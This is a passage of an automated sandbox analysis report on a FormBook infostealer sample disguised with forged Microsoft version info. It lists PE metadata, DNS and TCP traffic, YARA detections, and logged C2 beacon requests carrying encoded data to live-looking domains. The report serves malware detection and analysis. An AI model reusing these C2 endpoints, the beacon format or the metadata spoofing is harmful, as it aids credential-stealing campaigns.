                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x669b20x4a.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x680000x4956.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x6e0000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x64a020x64c00False0.957082137872data7.94131868162IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc0x680000x49560x4a00False0.173880912162data4.22602262855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x6e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x6806c0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294440951, next used block 4294440951
                                        RT_GROUP_ICON0x6c2d00x14data
                                        RT_VERSION0x6c3200x410data
                                        RT_MANIFEST0x6c76c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyright Microsoft Corporation. All rights reserved.
                                        Assembly Version6.1.7601.23834
                                        InternalNameVdltohs3.exe
                                        FileVersion6.1.7601.23834
                                        CompanyNameMicrosoft Corporation
                                        CommentsMicrosoft Help and Support
                                        ProductNameMicrosoft Windows Operating System
                                        ProductVersion6.1.7601.23834
                                        FileDescriptionMicrosoft Help and Support
                                        OriginalFilenameVdltohs3.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 20, 2020 16:33:34.725390911 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:34.833197117 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:34.833364964 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:34.833543062 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:34.939563990 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:34.942893982 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:34.942939043 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:34.942975044 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:34.943013906 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:34.943033934 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:34.943052053 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:34.943069935 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:34.943099976 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:34.943140984 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:34.943152905 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:34.943180084 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:34.943217993 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:34.943233013 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:34.943255901 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:34.943304062 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.049237967 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049300909 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049339056 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049398899 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.049405098 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049458027 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049479961 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.049498081 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049535036 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049559116 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.049573898 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049614906 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049655914 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.049662113 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049705029 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049729109 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.049746037 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049784899 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049823999 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049860001 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049885988 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.049890041 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049921036 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049959898 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.049962044 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.049997091 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.050026894 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.050059080 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.050115108 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156137943 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156202078 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156243086 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156280041 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156281948 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156321049 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156368971 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156411886 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156423092 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156443119 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156450987 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156490088 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156511068 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156527042 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156563997 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156582117 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156601906 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156641006 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156666994 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156687975 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156687975 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156697989 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156733990 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156752110 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156770945 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156794071 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156810045 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156824112 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156847954 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156868935 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156884909 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156912088 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156924963 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156944036 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.156963110 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.156994104 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.157010078 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.157052994 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.157052994 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.157068014 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.157089949 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.157124996 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.157129049 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.157145023 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.157166958 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.157175064 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.157203913 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.157224894 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.157243013 CET8049743198.185.159.141192.168.2.3
                                        Nov 20, 2020 16:33:35.157263041 CET4974380192.168.2.3198.185.159.141
                                        Nov 20, 2020 16:33:35.157280922 CET8049743198.185.159.141192.168.2.3

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 20, 2020 16:31:37.716008902 CET6511053192.168.2.38.8.8.8
                                        Nov 20, 2020 16:31:37.753664970 CET53651108.8.8.8192.168.2.3
                                        Nov 20, 2020 16:31:38.886259079 CET5836153192.168.2.38.8.8.8
                                        Nov 20, 2020 16:31:38.913505077 CET53583618.8.8.8192.168.2.3
                                        Nov 20, 2020 16:31:40.199696064 CET6349253192.168.2.38.8.8.8
                                        Nov 20, 2020 16:31:40.226741076 CET53634928.8.8.8192.168.2.3
                                        Nov 20, 2020 16:31:41.282166958 CET6083153192.168.2.38.8.8.8
                                        Nov 20, 2020 16:31:41.309237003 CET53608318.8.8.8192.168.2.3
                                        Nov 20, 2020 16:31:42.732551098 CET6010053192.168.2.38.8.8.8
                                        Nov 20, 2020 16:31:42.759645939 CET53601008.8.8.8192.168.2.3
                                        Nov 20, 2020 16:31:43.578700066 CET5319553192.168.2.38.8.8.8
                                        Nov 20, 2020 16:31:43.605797052 CET53531958.8.8.8192.168.2.3
                                        Nov 20, 2020 16:31:44.620488882 CET5014153192.168.2.38.8.8.8
                                        Nov 20, 2020 16:31:44.647614002 CET53501418.8.8.8192.168.2.3
                                        Nov 20, 2020 16:31:45.626663923 CET5302353192.168.2.38.8.8.8
                                        Nov 20, 2020 16:31:45.653712034 CET53530238.8.8.8192.168.2.3
                                        Nov 20, 2020 16:31:46.632806063 CET4956353192.168.2.38.8.8.8
                                        Nov 20, 2020 16:31:46.659962893 CET53495638.8.8.8192.168.2.3
                                        Nov 20, 2020 16:31:47.462408066 CET5135253192.168.2.38.8.8.8
                                        Nov 20, 2020 16:31:47.489501953 CET53513528.8.8.8192.168.2.3
                                        Nov 20, 2020 16:31:48.805653095 CET5934953192.168.2.38.8.8.8
                                        Nov 20, 2020 16:31:48.832789898 CET53593498.8.8.8192.168.2.3
                                        Nov 20, 2020 16:31:49.804553032 CET5708453192.168.2.38.8.8.8
                                        Nov 20, 2020 16:31:49.831583977 CET53570848.8.8.8192.168.2.3
                                        Nov 20, 2020 16:31:59.875031948 CET5882353192.168.2.38.8.8.8
                                        Nov 20, 2020 16:31:59.902120113 CET53588238.8.8.8192.168.2.3
                                        Nov 20, 2020 16:32:01.389939070 CET5756853192.168.2.38.8.8.8
                                        Nov 20, 2020 16:32:01.416979074 CET53575688.8.8.8192.168.2.3
                                        Nov 20, 2020 16:32:07.183087111 CET5054053192.168.2.38.8.8.8
                                        Nov 20, 2020 16:32:07.218885899 CET53505408.8.8.8192.168.2.3
                                        Nov 20, 2020 16:32:10.353229046 CET5436653192.168.2.38.8.8.8
                                        Nov 20, 2020 16:32:10.380398035 CET53543668.8.8.8192.168.2.3
                                        Nov 20, 2020 16:32:10.462378979 CET5303453192.168.2.38.8.8.8
                                        Nov 20, 2020 16:32:10.489438057 CET53530348.8.8.8192.168.2.3
                                        Nov 20, 2020 16:32:12.298270941 CET5776253192.168.2.38.8.8.8
                                        Nov 20, 2020 16:32:12.333836079 CET53577628.8.8.8192.168.2.3
                                        Nov 20, 2020 16:32:27.295954943 CET5543553192.168.2.38.8.8.8
                                        Nov 20, 2020 16:32:27.322926044 CET53554358.8.8.8192.168.2.3
                                        Nov 20, 2020 16:32:28.421916962 CET5071353192.168.2.38.8.8.8
                                        Nov 20, 2020 16:32:28.426913023 CET5613253192.168.2.38.8.8.8
                                        Nov 20, 2020 16:32:28.454065084 CET53561328.8.8.8192.168.2.3
                                        Nov 20, 2020 16:32:28.457412958 CET53507138.8.8.8192.168.2.3
                                        Nov 20, 2020 16:32:29.369177103 CET5898753192.168.2.38.8.8.8
                                        Nov 20, 2020 16:32:29.412585020 CET53589878.8.8.8192.168.2.3
                                        Nov 20, 2020 16:32:34.747100115 CET5657953192.168.2.38.8.8.8
                                        Nov 20, 2020 16:32:34.784126043 CET53565798.8.8.8192.168.2.3
                                        Nov 20, 2020 16:33:16.535996914 CET6063353192.168.2.38.8.8.8
                                        Nov 20, 2020 16:33:16.563107967 CET53606338.8.8.8192.168.2.3
                                        Nov 20, 2020 16:33:34.681273937 CET6129253192.168.2.38.8.8.8
                                        Nov 20, 2020 16:33:34.720000029 CET53612928.8.8.8192.168.2.3
                                        Nov 20, 2020 16:33:40.177280903 CET6361953192.168.2.38.8.8.8
                                        Nov 20, 2020 16:33:41.199937105 CET6361953192.168.2.38.8.8.8
                                        Nov 20, 2020 16:33:41.229835987 CET53636198.8.8.8192.168.2.3
                                        Nov 20, 2020 16:33:41.263674021 CET53636198.8.8.8192.168.2.3
                                        Nov 20, 2020 16:33:49.797297955 CET6493853192.168.2.38.8.8.8
                                        Nov 20, 2020 16:33:49.852216005 CET53649388.8.8.8192.168.2.3

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Nov 20, 2020 16:33:34.681273937 CET192.168.2.38.8.8.80x1cd1Standard query (0)www.ghoster.agencyA (IP address)IN (0x0001)
                                        Nov 20, 2020 16:33:40.177280903 CET192.168.2.38.8.8.80xa019Standard query (0)www.jibenentreprenad.mobiA (IP address)IN (0x0001)
                                        Nov 20, 2020 16:33:41.199937105 CET192.168.2.38.8.8.80xa019Standard query (0)www.jibenentreprenad.mobiA (IP address)IN (0x0001)
                                        Nov 20, 2020 16:33:49.797297955 CET192.168.2.38.8.8.80x9e95Standard query (0)www.amtpsychology.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Nov 20, 2020 16:33:34.720000029 CET8.8.8.8192.168.2.30x1cd1No error (0)www.ghoster.agencyext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                        Nov 20, 2020 16:33:34.720000029 CET8.8.8.8192.168.2.30x1cd1No error (0)ext-sq.squarespace.com198.185.159.141A (IP address)IN (0x0001)
                                        Nov 20, 2020 16:33:34.720000029 CET8.8.8.8192.168.2.30x1cd1No error (0)ext-sq.squarespace.com198.49.23.141A (IP address)IN (0x0001)
                                        Nov 20, 2020 16:33:41.229835987 CET8.8.8.8192.168.2.30xa019No error (0)www.jibenentreprenad.mobijibenentreprenad.mobiCNAME (Canonical name)IN (0x0001)
                                        Nov 20, 2020 16:33:41.229835987 CET8.8.8.8192.168.2.30xa019No error (0)jibenentreprenad.mobi184.168.131.241A (IP address)IN (0x0001)
                                        Nov 20, 2020 16:33:41.263674021 CET8.8.8.8192.168.2.30xa019No error (0)www.jibenentreprenad.mobijibenentreprenad.mobiCNAME (Canonical name)IN (0x0001)
                                        Nov 20, 2020 16:33:41.263674021 CET8.8.8.8192.168.2.30xa019No error (0)jibenentreprenad.mobi184.168.131.241A (IP address)IN (0x0001)
                                        Nov 20, 2020 16:33:49.852216005 CET8.8.8.8192.168.2.30x9e95Name error (3)www.amtpsychology.comnonenoneA (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.ghoster.agency
                                        • www.jibenentreprenad.mobi

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.349743198.185.159.14180C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 20, 2020 16:33:34.833543062 CET6320OUTGET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1
                                        Host: www.ghoster.agency
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 20, 2020 16:33:34.942893982 CET6321INHTTP/1.1 400 Bad Request
                                        content-length: 77564
                                        expires: Thu, 01 Jan 1970 00:00:00 UTC
                                        pragma: no-cache
                                        cache-control: no-cache, must-revalidate
                                        content-type: text/html; charset=UTF-8
                                        connection: close
                                        date: Fri, 20 Nov 2020 15:33:34 UTC
                                        x-contextid: Bwdk82gG/KU21r2Fa
                                        server: Squarespace
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                        Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.349744184.168.131.24180C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Nov 20, 2020 16:33:44.590300083 CET6402OUTGET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1
                                        Host: www.jibenentreprenad.mobi
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 20, 2020 16:33:44.781363964 CET6403INHTTP/1.1 301 Moved Permanently
                                        Server: nginx/1.16.1
                                        Date: Fri, 20 Nov 2020 15:33:44 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Location: https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Code Manipulations

                                        Statistics

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Start time:16:31:41
                                        Start date:20/11/2020
                                        Path:C:\Users\user\Desktop\kayx.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\Desktop\kayx.exe'
                                        Imagebase:0xec0000
                                        File size:432640 bytes
                                        MD5 hash:A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:16:32:45
                                        Start date:20/11/2020
                                        Path:C:\Users\user\Desktop\kayx.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\kayx.exe
                                        Imagebase:0x200000
                                        File size:432640 bytes
                                        MD5 hash:A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:16:32:46
                                        Start date:20/11/2020
                                        Path:C:\Users\user\Desktop\kayx.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\Desktop\kayx.exe
                                        Imagebase:0x2c0000
                                        File size:432640 bytes
                                        MD5 hash:A80E73A824B655491F54278B7A29467D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:16:32:46
                                        Start date:20/11/2020
